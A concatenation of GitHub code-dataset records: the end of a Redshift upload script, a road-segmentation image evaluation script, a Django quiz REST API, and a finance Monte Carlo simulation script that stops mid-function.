's3://pe-prod-redshift/adhoc_upload_files/Pred_SA_'\n credentials 'aws_access_key_id=\"\"\"+peProdRedshiftAccessKey+\"\"\";aws_secret_access_key=\"\"\"+peProdRedshiftSecretAccessKey+\"\"\"'\n IGNOREHEADER 1 delimiter ',' region 'ap-southeast-1'\n;\n \"\"\"\n lakeCursor = lakeConnection.cursor()\n logger.info(lakeInsertQuery)\n lakeCursor.execute(lakeInsertQuery)\n lakeCursor.execute(\"COMMIT;\")\n lakeCursor.execute(\"END;\")\n logger.info(\"Data copied.\")\n\n \ndef create():\n# id,order_id,text,create_time,total_length,capitals,caps_vs_length,num_words,num_unique_words,words_vs_unique,Sentiment_Output,Department_Output\n#\n lakeCreateTable=\"\"\"\n CREATE TABLE \"\"\" + schemaName + \"\"\".\"\"\" + tableName + \"\"\" \n (\n \"id\" varchar(256) NOT NULL,\n \"order_id\" varchar(256) NOT NULL,\n \"text\" varchar(65535),\n \"create_time\" datetime NOT NULL,\n \"total_length\" numeric(18,0),\n \"capitals\" numeric(18,8),\n \"caps_vs_length\" numeric(18,8),\n \"num_words\" numeric(18,8),\n \"num_unique_words\" numeric(18,8),\n \"words_vs_unique\" numeric(18,8),\n \"Sentiment_Output\" varchar(256) NOT NULL,\n \"Department_Output\" varchar(256) NOT NULL,\n PRIMARY KEY(order_id,create_time)\n );\"\"\"\n \n lakeCursor = lakeConnection.cursor()\n lakeCursor.execute(\"BEGIN;\")\n lakeCursor.execute(lakeCreateTable)\n lakeCursor.execute(\"COMMIT;\")\n logger.warning(\"Table created.\")\n \ndef drop():\n lakeDropTable=\"\"\"\n DROP TABLE \"\"\" + schemaName + \"\"\".\"\"\" + tableName + \"\"\" ;\"\"\"\n lakeCursor = lakeConnection.cursor()\n lakeCursor.execute(\"BEGIN;\")\n lakeCursor.execute(lakeDropTable)\n lakeCursor.execute(\"COMMIT;\")\n lakeCursor.execute(\"END;\")\n logger.warning(\"Table Dropped.\")\n \n", "repo_name": "SmokeShine/Call_Volume_Prediction_with_Scheduling", "sub_path": "src/models/push_to_db.py", "file_name": "push_to_db.py", "file_ext": "py", "file_size_in_byte": 3839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 50, "usage_type": "call"}, {"api_name": "boto3.s3.transfer.S3Transfer", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "35501671704", "text": "import csv\nimport glob\nimport os\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nfrom sklearn.metrics import confusion_matrix\nfrom tqdm import tqdm_notebook as tqdm\n\n\n# 混同行列を作成\ndef plot_confusion_matrix(cm, title=\"Confusion matrix\", cmap=plt.cm.Blues):\n plt.imshow(cm, interpolation=\"nearest\", cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(2)\n plt.xticks(tick_marks, [\"p\", \"n\"])\n plt.yticks(tick_marks, [\"Back\", \"Road\"])\n plt.tight_layout()\n plt.ylabel(\"True label\")\n plt.xlabel(\"Predicted label\")\n\n\n# 作成した図を表示して保存\ndef do_plot(test, pred, path, title=\"Normalized Confusion matrix\"):\n cm = confusion_matrix(test, pred)\n cm_normalized = cm.astype(\"float\") / cm.sum(axis=1)[:, np.newaxis]\n\n cm_normalized = [[cm_normalized[1][1], cm_normalized[1][0]],\n [cm_normalized[0][1], cm_normalized[0][0]]]\n\n plt.figure()\n plot_confusion_matrix(cm_normalized, title=title)\n plt.savefig(path + \"figure.png\") # learned_model_path\n plt.show()\n\n\n# 差異を出力するために必要なデータを作成\ndef get_diff_data(pred_path):\n bases = []\n preds = []\n filenames = []\n base_dir = \"./dataset/base_data/Roads/Test_Set/\"\n pred_dir = \"./dataset/eva_imgs/{}/large/\".format(pred_path)\n for base, pred in tqdm(zip(glob.glob(base_dir + \"*.tif\"), os.listdir(pred_dir)), desc=\"loading... \"):\n filenames.append(os.path.splitext(pred)[0])\n preds.append(pred_dir + pred)\n bases.append(base.replace('\\\\', '/'))\n return bases, preds, filenames\n\n\n# 出力画像とテスト画像の差異を表示\ndef show_diff(pred_path):\n diff_arr = []\n bases, preds, filenames = get_diff_data(pred_path)\n for num, filename in tqdm(enumerate(filenames), desc=\"images \", total=len(filenames)):\n match_count = 0\n base = cv2.imread(bases[num])\n pred = cv2.imread(preds[num])\n for i in tqdm(range(1280), desc=\"check match \", leave=False):\n for j in range(1280):\n # 予測済みデータには0, 255以外に半端な値が多く含まれているためそれらを除いた値でカウントしている\n if sum(base[i][j]) == sum(pred[i][j]):\n match_count += 1\n diff_arr.append([filename, match_count])\n # print(diff_arr)\n columns = [\"image_name\", \"match_count\"]\n df = pd.DataFrame(diff_arr, columns=columns)\n return df\n\n\n# テスト画像と予測済みデータを比較して誤っているデータの散布図を出力\ndef plot_diff_scat(test, pred):\n df = df.set_index(\"image_name\")\n plt.scatter(df.index, df['match_count'])\n plt.xticks(rotation=70)\n plt.show()\n\n\n# テスト画像と予測済みデータを比較して一致しているピクセル数を棒グラフとして出力\ndef plot_diff_bar(df, path, num=10, asce=False):\n df_asce = df.sort_values(by=\"match_count\", ascending=asce)\n plt.bar(df_asce['image_name'][:num], df_asce['match_count'][:num])\n plt.xticks(rotation=90)\n if (asce):\n plt.savefig(path + \"bar_graph.png\") # learned_model_path\n else:\n plt.savefig(path + \"arc_bar_graph.png\") # learned_model_path\n plt.show()\n\n\n# 出力のネガポジを判定\ndef make_diff_image(pred_path):\n WHITE = 765\n BLACK = 0\n img_size = 1280\n diff_arr = []\n bases, preds, filenames = get_diff_data(pred_path)\n validation_data = [filenames]\n for num, name in tqdm(enumerate(filenames)):\n diff_arr.append([])\n TP = 0\n TN = 0\n FP = 0\n FN = 0\n base = cv2.imread(bases[num])\n pred = cv2.imread(preds[num])\n for i in range(img_size):\n for j in range(img_size):\n # 予測済みデータには0, 255以外に半端な値が多く含まれているためそれらを除いた値でカウントしている\n if abs(sum(base[i][j]) - WHITE) < 100 and abs(sum(pred[i][j]) - WHITE) < 100:\n diff_arr[num].append([255, 255, 255]) # 白\n TP += 1\n elif abs(sum(base[i][j]) - BLACK) < 100 and abs(sum(pred[i][j]) - BLACK) < 100:\n diff_arr[num].append([0, 0, 0]) # 黒\n TN += 1\n elif sum(base[i][j]) == BLACK and sum(pred[i][j]) != BLACK:\n diff_arr[num].append([0, 128, 0]) # 緑\n FP += 1\n elif sum(base[i][j]) == WHITE and sum(pred[i][j]) != WHITE:\n diff_arr[num].append([255, 0, 0]) # 赤\n FN += 1\n validation_data.append([TP, TN, FP, FN])\n return diff_arr, filenames, validation_data\n\n\n# ネガポジ判定した値を画像として出力(赤:PN, 緑:NP)\ndef plot_diff_image(now):\n save_dir = \"./dataset/pn_imgs/\" + str(now) + \"/\"\n os.makedirs(save_dir, exist_ok=True)\n arr, filenames, validation_data = make_diff_image(now)\n for i, name in tqdm(enumerate(filenames), total=len(arr)):\n img = np.uint8(arr[i]).reshape(1280, 1280, 3)\n img = Image.fromarray(img)\n img.save(save_dir + name + \".jpg\")\n return validation_data\n\n\n# 混同行列と評価値を画像ごとにCSVとして出力\ndef evaluation(validation_data, now):\n completeness = []\n correctness = []\n quality = []\n count = 0\n filename = validation_data[0]\n validation_data = validation_data[1:]\n save_dir = \"./dataset/evaluation/\"\n os.makedirs(save_dir, exist_ok=True)\n for name, data in tqdm(zip(filename, validation_data)):\n TP = data[0]\n TN = data[1]\n FP = data[2]\n FN = data[3]\n completeness = '%.4f' % (TP / (TP + FN))\n correctness = '%.4f' % (TP / (TP + FP))\n quality = '%.4f' % (TP / (TP + FN + FP))\n with open(save_dir + str(now) + \".csv\", 'a') as f:\n fieldnames = ['image_name', 'TruePositive', 'FalsePositive', 'TrueNegative',\n 'FalseNegative', 'Completeness', 'Correctness', 'Quality']\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n if count == 0:\n writer.writeheader()\n writer.writerow({'image_name': name, 'TruePositive': TP, 'FalsePositive': TN, 'TrueNegative': FP, 'FalseNegative': FN,\n 'Completeness': completeness, 'Correctness': correctness, 'Quality': quality})\n count += 1\n\n\n# evaluation('01172024')\n\n# filename = \"./dataset/evaluation/01161510.csv\"\n# f = pd.read_csv(filename)\n# y = f['Quality']\n# x_name = f['image_name']\n# xx = [i for i in range(49)]\n# plt.barh(xx, y, height=0.3, align='center')\n# plt.yticks(xx, x_name)\n# plt.show()\n", "repo_name": "naoyasugita/dissertation", "sub_path": "src/post_process.py", "file_name": "post_process.py", "file_ext": "py", "file_size_in_byte": 6733, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.cm", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 48, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 48, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 62, "usage_type": "call"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 110, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 133, "usage_type": "call"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 136, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 137, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 137, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 151, "usage_type": "call"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 152, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 163, "usage_type": "call"}]}
+{"seq_id": "12058641821", "text": "# from django.shortcuts import render\nfrom datetime import datetime\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Answer, Quiz, Question\nfrom .serializers import QuizSerializer, QuestionSerializer, AnswerSerializer\n\nclass QuizView(APIView):\n def get(self, request):\n quizes = Quiz.objects.all()\n serializer = QuizSerializer(quizes, many=True)\n\n return Response({\"quizes\": serializer.data})\n\n\nclass QuestionView(APIView):\n def get(self, request):\n quiz_id = request.data.get('quiz_id')\n\n # If quiz_id is uncorrect\n if quiz_id is None:\n return Response({\"error\": \"quiz_id undefined\"}, status=400)\n\n # Get all questions from quiz\n questions = Question.objects.filter(quiz_id=quiz_id)\n serializer = QuestionSerializer(questions, many=True)\n\n return Response({\"questions\": serializer.data})\n\n\nclass AnswerView(APIView):\n def post(self, request):\n user_id = request.data.get('user_id')\n question_id = request.data.get('question_id')\n text = request.data.get('text')\n\n # If user don't send one of the required data\n if (user_id is None) or (question_id is None) or (text is None): \n return Response({\"error\": \"undefined value, check what you are sending user_id, question_id and text\"}, status=400)\n\n # Try get question from Question\n try:\n question = Question.objects.get(id=question_id)\n except Question.DoesNotExist: # If question_id is uncorrect\n return Response({\"error\": \"not valid question_id\"}, status=400)\n\n # Try get answer from Answer that check if the user has already sent a response\n try:\n answer = Answer.objects.get(user_id=user_id, question_id=question_id)\n return Response({\"error\": \"you already sent a reply\"}, status=400)\n except Answer.DoesNotExist: # If user didn't respond, just skip it \n pass\n\n serializer = QuestionSerializer(question, many=False)\n quiz_id = serializer.data['quiz_id'] # Get quiz_id for save answer\n type = serializer.data['type'] # Get type for check what the user send\n\n # Get quiz for check date_ended and date_started\n quiz = Quiz.objects.get(id=quiz_id)\n serializer = QuizSerializer(quiz, many=False)\n date_started = serializer.data['date_started']\n date_ended = serializer.data['date_ended']\n date_now = datetime.now()\n\n # Convert str to datetime\n date_started = datetime.strptime(date_started, '%d-%m-%Y')\n date_ended = datetime.strptime(date_ended, '%d-%m-%Y')\n\n if date_now < date_started: # If quiz not started\n return Response({\"error\": \"quiz not started yet\"}, status=400)\n elif date_now > date_ended: # If quiz alreade ended\n return Response({\"error\": \"quiz has already ended\"}, status=400)\n\n # If the answer to the question can only be numeric \n if type == '2' or type == '3':\n if text.isdigit() is False: # If the text is not a numeric\n return Response({\"error\": \"question supports only numeric answer\"}, status=400)\n\n # Add answer\n answer = Answer(user_id=user_id, quiz_id=quiz_id, question_id=question_id, text=text)\n answer.save()\n\n return Response({\"success\": \"answer added\"})\n\n\nclass UserView(APIView):\n def get(self, request):\n user_id = request.data.get('user_id')\n quiz_id = request.data.get('quiz_id')\n\n # If user don't send one of the required data\n if (user_id is None) or (quiz_id is None): \n return Response({\"error\": \"undefined value, check what you are sending user_id and quiz_id\"}, status=400)\n\n # Get all answers from Answer\n answers = Answer.objects.filter(user_id=user_id, quiz_id=quiz_id)\n serializer = AnswerSerializer(answers, many=True)\n\n return Response({\"answers\": serializer.data})", "repo_name": "Blazzerrr/Quiz", "sub_path": "restapi/quiz/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Quiz.objects.all", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Quiz.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "models.Quiz", "line_number": 10, "usage_type": "name"}, {"api_name": "serializers.QuizSerializer", "line_number": 11, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 16, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Question.objects.filter", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 25, "usage_type": "name"}, {"api_name": "serializers.QuestionSerializer", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Question.objects.get", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 43, "usage_type": "name"}, {"api_name": "models.Question.DoesNotExist", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Answer.objects.get", "line_number": 49, "usage_type": "call"}, {"api_name": "models.Answer.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 49, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Answer.DoesNotExist", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 51, "usage_type": "name"}, {"api_name": "serializers.QuestionSerializer", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Quiz.objects.get", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Quiz.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Quiz", "line_number": 59, "usage_type": "name"}, {"api_name": "serializers.QuizSerializer", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 70, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "models.Answer", "line_number": 80, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 83, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 93, "usage_type": "call"}, {"api_name": "models.Answer.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Answer.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 96, "usage_type": "name"}, {"api_name": "serializers.AnswerSerializer", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "31313807187", "text": "import sys, pdb\nsys.path.append('/usr/share/doc')\nsys.path.append(\"/usr/lib/python3/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport numpy as np\nimport numpy.random as npr\nimport matplotlib.pyplot as plt\nimport scipy.stats as scs\nfrom utils import timeme\n\nPATH = '/home/ubuntu/workspace/python_for_finance/png/book_examples/ch10/'\n\ndef randon_nums():\n print(npr.rand(10))\n print(npr.rand(5, 5))\n a = 5.\n b = 10.\n print(npr.rand(10) * (b - a) + a)\n print(npr.rand(5, 5) * (b - a) + a)\n sample_size = 500\n rn1 = npr.rand(sample_size, 3)\n rn2 = npr.randint(0, 10, sample_size)\n rn3 = npr.sample(size=sample_size)\n a = [0, 25, 50, 75, 100]\n rn4 = npr.choice(a, size=sample_size)\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2,\n figsize=(7, 7))\n ax1.hist(rn1, bins=25, stacked=True)\n ax1.set_title('rand')\n ax1.set_ylabel('frequency')\n ax1.grid(True)\n ax2.hist(rn2, bins=25)\n ax2.set_title('randint')\n ax2.grid(True)\n ax3.hist(rn3, bins=25)\n ax3.set_title('sample')\n ax3.set_ylabel('frequency')\n ax3.grid(True)\n ax4.hist(rn4, bins=25)\n ax4.set_title('choice')\n ax4.grid(True)\n plt.savefig(PATH + 'rand1.png', dpi=300)\n plt.close()\n\n sample_size = 500\n rn1 = npr.standard_normal(sample_size)\n rn2 = npr.normal(100, 20, sample_size)\n rn3 = npr.chisquare(df=0.5, size=sample_size)\n rn4 = npr.poisson(lam=1.0, size=sample_size)\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2, figsize=(7, 7))\n ax1.hist(rn1, bins=25)\n ax1.set_title('standard normal')\n ax1.set_ylabel('frequency')\n ax1.grid(True)\n ax2.hist(rn2, bins=25)\n ax2.set_title('normal(100, 20)')\n ax2.grid(True)\n ax3.hist(rn3, bins=25)\n ax3.set_title('chi square')\n ax3.set_ylabel('frequency')\n ax3.grid(True)\n ax4.hist(rn4, bins=25)\n ax4.set_title('Poisson')\n ax4.grid(True)\n plt.savefig(PATH + 'rand2.png', dpi=300)\n plt.close()\n\ndef rand_vals():\n S0 = 100 # initial value\n r = 0.05 # constant short rate\n sigma = 0.25 # constant volatility\n T = 2.0 # in years\n I = 10000 # number of random draws\n ST1 = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * npr.standard_normal(I))\n plt.hist(ST1, bins=50)\n plt.xlabel('index level')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'rand_vals1.png', dpi=300)\n plt.close()\n \n ST2 = S0 * npr.lognormal((r - 0.5 * sigma ** 2) * T,\n sigma * np.sqrt(T), size=I)\n plt.hist(ST2, bins=50)\n plt.xlabel('index level')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'rand_vals2.png', dpi=300)\n plt.close()\n print_statistics(ST1, ST2)\n \ndef print_statistics(a1, a2):\n ''' Prints selected statistics.\n \n Parameters\n ==========\n a1, a2 : ndarray objects\n results object from simulation\n '''\n sta1 = scs.describe(a1)\n sta2 = scs.describe(a2)\n print(\"%14s %14s %14s\" % \n ('statistic', 'data set 1', 'data set 2'))\n print(45 * \"-\")\n print(\"%14s %14.3f %14.3f\" % ('size', sta1[0], sta2[0]))\n print(\"%14s %14.3f %14.3f\" % ('min', sta1[1][0], sta2[1][0]))\n print(\"%14s %14.3f %14.3f\" % ('max', sta1[1][1], sta2[1][1]))\n print(\"%14s %14.3f %14.3f\" % ('mean', sta1[2], sta2[2]))\n print(\"%14s %14.3f %14.3f\" % ('std', np.sqrt(sta1[3]), np.sqrt(sta2[3])))\n print(\"%14s %14.3f %14.3f\" % ('skew', sta1[4], sta2[4]))\n print(\"%14s %14.3f %14.3f\" % ('kurtosis', sta1[5], sta2[5]))\n \ndef stochastic_procs():\n I = 10000\n M = 50\n T = 2.0 # in years\n S0 = 100 # initial value\n r = 0.05 # constant short rate\n sigma = 0.25 # constant volatility\n dt = T / M\n S = np.zeros((M + 1, I))\n S[0] = S0\n ST1 = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * npr.standard_normal(I))\n ST2 = S0 * npr.lognormal((r - 0.5 * sigma ** 2) * T,\n sigma * np.sqrt(T), size=I)\n \n # Geometric Brownian motion\n for t in range(1, M + 1):\n S[t] = S[t - 1] * np.exp((r - 0.5 * sigma ** 2) * dt \n + sigma * np.sqrt(dt) * npr.standard_normal(I))\n plt.hist(S[-1], bins=50)\n plt.xlabel('index level')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'stoch_procs1.png', dpi=300)\n plt.close()\n\n print_statistics(S[-1], ST2)\n \n plt.plot(S[:, :10], lw=1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.savefig(PATH + 'stoch_procs2.png', dpi=300)\n plt.close()\n\ndef sqr_rt_diffusion():\n T = 2.0 # in years\n x0 = 0.05\n kappa = 3.0\n theta = 0.02\n sigma = 0.1\n I = 10000\n M = 50\n dt = T / M\n x1 = srd_euler()\n plt.hist(x1[-1], bins=50)\n plt.xlabel('value')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'sqr_rt1.png', dpi=300)\n plt.close()\n \n plt.plot(x1[:, :10], lw=1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.savefig(PATH + 'sqr_rt2.png', dpi=300)\n plt.close()\n \n x2 = srd_exact()\n plt.hist(x2[-1], bins=50)\n plt.xlabel('value')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'sqr_rt3.png', dpi=300)\n plt.close()\n \n plt.plot(x2[:, :10], lw=1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.savefig(PATH + 'sqr_rt4.png', dpi=300)\n plt.close()\n\n print_statistics(x1[-1], x2[-1])\n I = 250000\n x1 = timeme(srd_euler)()\n x2 = timeme(srd_exact)()\n print_statistics(x1[-1], x2[-1])\n\ndef srd_euler():\n T = 2.0 # in years\n x0 = 0.05\n kappa = 3.0\n theta = 0.02\n sigma = 0.1\n I = 10000\n M = 50\n dt = T / M\n xh = np.zeros((M + 1, I))\n x1 = np.zeros_like(xh)\n xh[0] = x0\n x1[0] = x0\n for t in range(1, M + 1):\n xh[t] = (xh[t - 1]\n + kappa * (theta - np.maximum(xh[t - 1], 0)) * dt\n + sigma * np.sqrt(np.maximum(xh[t - 1], 0)) * np.sqrt(dt) \n * npr.standard_normal(I))\n x1 = np.maximum(xh, 0)\n return x1\n\ndef srd_exact():\n T = 2.0 # in years\n x0 = 0.05\n kappa = 3.0\n theta = 0.02\n sigma = 0.1\n I = 10000\n M = 50\n dt = T / M\n x2 = np.zeros((M + 1, I))\n x2[0] = x0\n for t in range(1, M + 1):\n df = 4 * theta * kappa / sigma ** 2\n c = (sigma ** 2 * (1 - np.exp(-kappa * dt))) / (4 * kappa)\n nc = np.exp(-kappa * dt) / c * x2[t - 1] \n x2[t] = c * npr.noncentral_chisquare(df, nc, size=I)\n return x2\n \ndef stoch_vol():\n S0 = 100.\n r = 0.05\n v0 = 0.1\n kappa = 3.0\n theta = 0.25\n sigma = 0.1\n rho = 0.6\n T = 1.0\n corr_mat = np.zeros((2, 2))\n corr_mat[0, :] = [1.0, rho]\n corr_mat[1, :] = [rho, 1.0]\n cho_mat = np.linalg.cholesky(corr_mat)\n print(cho_mat)\n M = 50\n I = 10000\n ran_num = npr.standard_normal((2, M + 1, I))\n dt = T / M\n v = np.zeros_like(ran_num[0])\n vh = np.zeros_like(v)\n v[0] = v0\n vh[0] = v0\n for t in range(1, M + 1):\n ran = np.dot(cho_mat, ran_num[:, t, :])\n vh[t] = (vh[t - 1] + kappa * (theta - np.maximum(vh[t - 1], 0)) * dt\n + sigma * np.sqrt(np.maximum(vh[t - 1], 0)) * np.sqrt(dt) \n * ran[1])\n v = np.maximum(vh, 0)\n S = np.zeros_like(ran_num[0])\n S[0] = S0\n for t in range(1, M + 1):\n ran = np.dot(cho_mat, ran_num[:, t, :])\n S[t] = S[t - 1] * np.exp((r - 0.5 * v[t]) * dt +\n np.sqrt(v[t]) * ran[0] * np.sqrt(dt))\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9, 5))\n ax1.hist(S[-1], bins=50)\n ax1.set_xlabel('index level')\n ax1.set_ylabel('frequency')\n ax1.grid(True)\n ax2.hist(v[-1], bins=50)\n ax2.set_xlabel('volatility')\n ax2.grid(True)\n plt.savefig(PATH + 'stoch_vol1.png', dpi=300)\n plt.close()\n\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(7, 6))\n ax1.plot(S[:, :10], lw=1.5)\n ax1.set_ylabel('index level')\n ax1.grid(True)\n ax2.plot(v[:, :10], lw=1.5)\n ax2.set_xlabel('time')\n ax2.set_ylabel('volatility')\n ax2.grid(True)\n 